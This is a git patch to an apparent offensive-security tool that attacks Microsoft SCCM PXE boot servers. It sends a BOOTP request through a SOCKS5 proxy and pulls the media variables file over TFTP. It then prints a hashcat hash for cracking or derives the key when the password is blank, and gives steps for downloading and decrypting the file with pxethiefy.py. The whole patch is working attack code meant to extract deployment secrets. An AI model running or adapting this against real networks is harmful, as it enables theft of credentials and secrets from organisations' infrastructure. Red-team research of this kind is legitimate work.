From a57ae8c7c8a2113c3380703346a95133f88141a2 Mon Sep 17 00:00:00 2001
From: Adam Chester <xpnsec@protonmail.com>
Date: Wed, 4 Sep 2024 23:54:10 +0100
Subject: [PATCH] Updated and added README

---
 main.py | 30 ++++++++++++++----------------
 1 file changed, 14 insertions(+), 16 deletions(-)

diff --git a/main.py b/main.py
index a6741e1..fcaf7d9 100644
--- a/main.py
+++ b/main.py
@@ -21,32 +21,30 @@
 sccm_client = sccm.SCCM(args.target, 4011, client)
 (variables,bcd,cryptokey) = sccm_client.send_bootp_request(args.src_ip, "11:22:33:44:55:66")
 
+print(f"[*] Variables file: {variables}")
+print(f"[*] BCD file: {bcd}")
+
 client.close()
 
 # TFTP Limitation over SOCKS5 means we can only grab the first few bytes (we can't ack the request):()
 client = socks.SOCKS5Client(args.socks_host, args.socks_port)
 client.connect()
 
-# tftp_client = tftp.TFTPClient(args.target, 69, client)
-
-# data_a = tftp_client.get_file(variables)
-# data_b = tftp_client.get_file(bcd)
+tftp_client = tftp.TFTPClient(args.target, 69, client)
+data_variables = tftp_client.get_file(variables)
 
 if cryptokey == None:
-    hashcat_hash = f"$sccm$aes128${sccm_client.read_media_variable_file_header(data_a).hex()}"
+    hashcat_hash = f"$sccm$aes128${sccm_client.read_media_variable_file_header(data_variables).hex()}"
     print(hashcat_hash)
-    print("Try cracking this hash to read the media file")
+    print("[*] Try cracking this hash to read the media file")
 else:
-    print("Blank password on PXE media file found!")
-    print("Attempting to decrypt it...")
+    print("[*] Blank password on PXE media file found!")
+    print("[*] Attempting to decrypt it...")
     decrypt_password = sccm_client.derive_blank_decryption_key(cryptokey)
     if( decrypt_password ):
-        print("Password retrieved: " + decrypt_password.hex())
+        print("[*] Password retrieved: " + decrypt_password.hex())
         
-        #media_variables = sccm_client.decrypt_media_file(data_a, decrypt_password)
-        #if( media_variables ):
-        #    sccm_client.process_pxe_media_xml(media_variables)
-
-# client.send(example_dns_a_request, ("192.168.130.12", 4011))
-# data = client.recv(1024)
-# print(data)
\ No newline at end of file
+print("[*] Once you have the key, download the variables file from:")
+print(f"[*] \\\\{args.target}\\REMINST{variables}")
+print("[*] You can then decrypt this with PXEThiefy.py using:")
+print("[*] python3 pxethiefy.py decrypt -p PASSWORD -f <variables_file>")
\ No newline at end of file